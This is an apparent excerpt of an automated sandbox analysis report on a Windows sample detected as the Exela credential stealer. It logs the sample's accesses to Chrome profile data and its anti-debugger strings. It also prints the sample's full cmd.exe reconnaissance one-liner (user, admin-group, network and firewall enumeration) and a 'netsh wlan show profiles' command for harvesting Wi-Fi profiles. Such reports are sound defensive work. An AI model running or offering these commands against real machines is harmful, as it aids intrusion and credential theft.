Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI67602 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\BrowserMetrics VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\attachments VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad\reports VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\af VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\am VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\el VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_CA VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_GB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\en_US VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\es VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\fil VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_locales\id VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.66.0_0\_metadata VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\Temp VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285f VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2 VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def VolumeInformation Jump to behavior
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\attrs-23.2.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\attrs-23.2.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\attrs-23.2.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\attrs-23.2.0.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography-42.0.5.dist-info VolumeInformation
Queries time zone information
Source: C:\Windows\System32\net1.exe Key value queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\TimeZoneInformation Bias
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA7C590 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_00007FF72AA7C590
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Code function: 0_2_00007FF72AA96950 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 0_2_00007FF72AA96950

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the windows firewall
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
AV process strings found (often used to terminate AV products)
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ollydbg.exe

Stealing of Sensitive Information
barindex
Yara detected Exela Stealer
Source: Yara match File source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe PID: 6816, type: MEMORYSTR
Yara detected Python Stealer
Source: Yara match File source: 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.1999333870.000002DCD07D8000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2000507238.000002DCD1A20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.2000591564.000002DCD1B20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
